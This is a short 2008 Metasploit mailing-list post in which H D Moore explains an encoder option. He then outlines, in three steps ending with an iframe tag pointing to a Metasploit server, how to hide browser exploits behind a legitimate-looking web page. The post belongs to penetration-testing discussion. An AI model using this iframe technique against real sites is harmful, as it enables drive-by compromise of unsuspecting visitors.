Metasploit mailing list archives

ContextInformationFile

From: hdm at metasploit.com (H D Moore)
Date: Fri, 12 Dec 2008 21:55:09 -0600

On Friday 12 December 2008, jeffs wrote:

I'm guessing that ContextInformationFile has nothing to do with decoy
data sent along in an http type of exploit, like a decoy html page that
looks real whilst the exploit is working in the background. Many of
these exploits have no method of including a real page of data other
than the exploit code, right?


ContextInformationFile is an encoder option, it has nothing to do with the 
exploits, take a look at:
http://uninformed.org/?v=9&a=3&t=sumry

Can the URIPATH actually have some real meat to it?


No, but thats not the way to hide exploits in real pages. Basically, what 
you would do is:

1) Setup a real web server with whatever content you want.

2) Setup metasploit with whatever exploits/payloads you want, choosing or 
writing down what URIs go to which exploit

3) On your real web server, add <iframe src="http://msf:8080/URIPATH";>'s

-HD

Current thread:

ContextInformationFile jeffs (Dec 12)
- ContextInformationFile H D Moore (Dec 12)